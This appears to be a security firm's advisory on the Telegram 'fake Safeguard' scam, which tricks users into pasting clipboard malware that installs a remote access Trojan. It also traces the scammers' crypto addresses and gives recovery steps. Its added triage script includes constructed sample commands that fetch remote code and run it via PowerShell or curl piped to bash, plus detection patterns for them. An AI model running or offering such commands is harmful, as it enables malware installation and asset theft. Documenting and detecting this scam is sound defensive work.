Recently, we have received many distress messages from victims of the "fake Safeguard" scam on Telegram. Because most users are unfamiliar with this type of attack, they are rarely on guard when they encounter it, and both newcomers and experienced users fall for it. This article walks through how the scam works and offers practical advice to help users keep their assets safe.
Scam Analysis
This scam comes in two main variants. In the first, the scammer takes over the victim's Telegram account by tricking them into entering their phone number, login code, or even their Two-Step Verification password. In the second, which has become the more common one recently, the scammer gets a Trojan onto the victim's computer. This article focuses on the second variant.
During a hyped token airdrop, when FOMO is at its peak, the user sees a Telegram Channel like the one in the image and, almost inevitably, clicks "Tap to verify":
Clicking it opens a fake Safeguard bot that appears to be running a verification check. The time limit it shows is deliberately short, creating a sense of urgency that pushes the user to keep going.
As the user keeps clicking, the bot pretends that automatic verification has failed and finally shows a prompt asking the user to verify manually:
The scammer has helpfully laid out Step 1, Step 2 and Step 3. By this point the fake bot has already written malicious code into the user's clipboard. Nothing has happened yet; as long as the user does not actually carry out these steps, no harm is done:
But if the user dutifully follows the steps, the computer is infected with malware.
Here is another example, in which the attacker impersonates a KOL and uses a malicious bot to get the user to run malicious PowerShell code. The scammers create a fake X account in the KOL's name and post a Telegram link in the replies, inviting users to join an "exclusive" Telegram group for investment tips. For example, a scam account is active in the replies under @BTW0205, where many users will see this "exciting news":
Users who follow the link land in the corresponding Telegram Channel, which prompts them to verify.
Clicking verify brings up a fake Safeguard bot which, as in the previous case, walks the user through Step 1, Step 2 and Step 3.
At this point malicious code has already been silently placed in the user's clipboard. If the user follows the guide, opens the Run box (Win + R) and pastes with Ctrl + V, the Run box looks like the figure below: a large blank area, then the Telegram logo, then the malicious code. The blank area is padding, so that the Run box's single-line field never shows the user the whole command.
The pasted content is usually a PowerShell command that, once run, silently downloads further stages and ultimately installs a remote access Trojan (such as Remcos). Once the Trojan has control of the machine, the attacker can remotely steal wallet files, seed phrases, private keys, passwords and other sensitive data, and drain the assets.
The replies under the Ethereum Foundation account @ethereumfndn have also been polluted with this scam, which is being run as a large-scale spray-and-harvest operation.
The latest wave has also reached the replies under Trump's X account:
If you open the link on a phone instead, the scam works step by step towards taking over your Telegram account. If you notice in time, go straight to Telegram Settings -> Privacy and Security -> Active Sessions -> Terminate All Other Sessions, then enable Two-Step Verification or change its password.
Mac users are not spared: the same trick has a macOS version. When the screen below appears in Telegram, malicious code has already been placed in your clipboard.
Nothing has happened yet at this point, but following the given steps leads to the result shown in the image below:
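To make the pasted strings in the Windows Run-box case and the macOS Terminal case concrete, here is an added triage script. It is not SlowMist's code and does not reproduce the scammers' actual payload; it scores an entry for the traits described above: a launcher such as powershell or bash, a hidden window or execution-policy bypass, a remote fetch piped into execution, the long blank padding that keeps the Run box from showing the whole command, and a decoy "verification" comment with an emoji. On Windows the Run box records what was typed under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (one value per entry, each ending in "\1", with MRUList giving the order), so the same function can be run over those values during incident response; the macOS case is handled by decoding base64 blobs to find a hidden curl-piped-to-bash stage. The sample entries are constructed, the download host example.invalid is a placeholder, and the indicator list is an assumption about typical payloads of this kind rather than a copy of this campaign.

```python
"""Triage strings pasted into the Windows Run box or a macOS Terminal.

Added example, not SlowMist's code. Entries are assumed to have been read
out of HKCU\\...\\Explorer\\RunMRU (Windows) or shell history (macOS) already.
The sample payloads below are constructed and use example.invalid; they are
not the scammers' actual code.
"""
import base64
import re
import unicodedata

# Programs that execute whatever follows them when launched from Run or a shell.
LAUNCHERS = re.compile(
    r"\b(powershell(?:\.exe)?|pwsh|mshta(?:\.exe)?|cmd(?:\.exe)?|wscript|cscript|"
    r"certutil|bitsadmin|curl|wget|bash|zsh|sh|osascript)\b",
    re.IGNORECASE,
)

# Cheap indicators; the verdict requires a launcher plus at least two of them.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("remote_fetch", re.compile(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|"
                                r"DownloadString|DownloadFile|curl|wget)\b", re.I)),
    ("inline_exec", re.compile(r"\b(iex|Invoke-Expression)\b|\|\s*(ba|z)?sh\b", re.I)),
    ("url", re.compile(r"https?://[^\s\"']+", re.I)),
    ("policy_bypass", re.compile(r"-(ep|executionpolicy)\s+bypass|-nop\b", re.I)),
    ("base64_decode", re.compile(r"\bbase64\s+(-d|-D|--decode)\b")),
    # The "large blank area" from the article: a long run of (possibly invisible
    # Unicode) spaces so the Run box's single-line field cannot show the whole command.
    ("padding", re.compile(r"[ \t\u00a0\u2000-\u200b\u3000]{20,}")),
    # Decoy comment that makes the visible tail look like a verification token.
    ("decoy_comment", re.compile(r"#.*?(verif|captcha|robot|telegram|safeguard)", re.I)),
]

_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_layers(text: str) -> list[str]:
    """Decode base64 blobs that hide a second command (PowerShell -enc is UTF-16LE)."""
    found = []
    for blob in _B64_BLOB.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:          # binascii.Error is a ValueError
            continue
        for encoding in ("utf-16-le", "utf-8"):
            try:
                plain = raw.decode(encoding)
            except UnicodeDecodeError:
                continue
            if plain.isprintable() and LAUNCHERS.search(plain):
                found.append(plain)
    return found


def analyze(entry: str) -> dict:
    """Score one Run-box (RunMRU) or shell-history entry."""
    text = entry[:-2] if entry.endswith("\\1") else entry   # strip RunMRU's "\1" suffix
    layers = [text] + decoded_layers(text)
    hits = sorted({name for layer in layers for name, rx in INDICATORS if rx.search(layer)})
    if any(unicodedata.category(ch) == "So" for ch in text):   # e.g. the check-mark emoji
        hits.append("emoji")
    launcher = LAUNCHERS.search(text)
    return {
        "launcher": launcher.group(0).lower() if launcher else None,
        "hits": hits,
        "decoded": layers[1:],
        "suspicious": launcher is not None and len(hits) >= 2,
    }


def triage_runmru(values: dict) -> list[dict]:
    """Walk a RunMRU-style mapping most-recent-first (MRUList lists the slot letters)."""
    return [dict(analyze(values[slot]), slot=slot)
            for slot in values.get("MRUList", "") if slot in values]


# Constructed samples (not real payloads). The Windows one mimics the layout
# described in the article: command, a long blank run, then a decoy "verification" tail.
SAMPLE_WIN_RUN = ('powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/v)"'
                  + " " * 60 + "# \u2705 ''I am not a robot - Telegram Safeguard Verification''")
_MAC_STAGE = base64.b64encode(b"curl -fsSL https://example.invalid/m | bash").decode()
SAMPLE_MAC_TERMINAL = f"echo {_MAC_STAGE} | base64 -d | bash"
SAMPLE_RUNMRU = {"MRUList": "ba", "a": "notepad\\1", "b": SAMPLE_WIN_RUN + "\\1"}

if __name__ == "__main__":
    for label, entry in (("win", SAMPLE_WIN_RUN), ("mac", SAMPLE_MAC_TERMINAL)):
        print(label, analyze(entry))
    print(triage_runmru(SAMPLE_RUNMRU))
```

To use it on a real host after the fact, read the RunMRU values (for example with Get-ItemProperty in PowerShell) or the shell history into the mapping and call triage_runmru; any entry that scores suspicious is reason to treat the machine as compromised and begin the steps under "How to prevent" below.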
MistTrack Analysis
We selected several hacker addresses and analyzed them with MistTrack, the on-chain tracking and anti-money laundering platform.
Solana hacker addresses:
HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV
2v1DUcjyNBerUcYcmjrDZNpxfFuQ2Nj28kZ9mea3T36W
D8TnJAXML7gEzUdGhY5T7aNfQQXxfr8k5huC6s11ea5R
According to MistTrack, these three addresses have so far taken in over $1.2 million in SOL and various SPL Tokens.
The hackers first convert most of the SPL Tokens into SOL:
They then spread the SOL across multiple addresses; the hacker addresses also interact with platforms such as Binance, Huobi and FixedFloat:
Additionally, the address HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV currently has a balance of 1,169.73 SOL and Tokens worth over $10,000.
We also analyzed one of the Ethereum hacker addresses, 0x21b681c98ebc32a9c6696003fc4050f63bc8b2c6. Its first transaction was in January 2025, it is active on multiple chains, and its current balance is around $130,000.
This address sends ETH to several platforms, including ChangeNOW, eXch and Cryptomus.com:
How to prevent
If your computer is infected, do the following immediately, using a separate clean device wherever possible:
1. Immediately move any funds or assets in wallets that have ever been used on this computer to fresh wallets created on a clean device; do not assume a password-protected wallet is safe, since the attacker can capture passwords on a compromised machine;
2. Change the passwords and re-enroll 2FA for every account whose credentials were saved in your browsers or used on this computer;
3. Change the passwords of any other accounts logged in on the computer, such as Telegram, and terminate their other active sessions.
Assume the worst case: the computer is compromised and everything on it is visible to the scammers. Think like a scammer: if you had full control of an active Web3/crypto machine, what would you go after? Finally, after backing up important data, wipe and reinstall the operating system, install a reputable antivirus such as AVG, Bitdefender or Kaspersky, and run a full system scan.
Summary
The fake Safeguard scam has matured into a complete attack chain: fake replies lure victims, malware is implanted, and assets are stolen, with every step of the process stealthy and efficient. As these methods grow more sophisticated, users need to be more wary of any link or set of "verification steps" they are urged to follow online; in particular, never paste content you did not write yourself into the Run box or a terminal. Staying vigilant, hardening your devices, and detecting and responding to threats early are the effective defenses against this scam.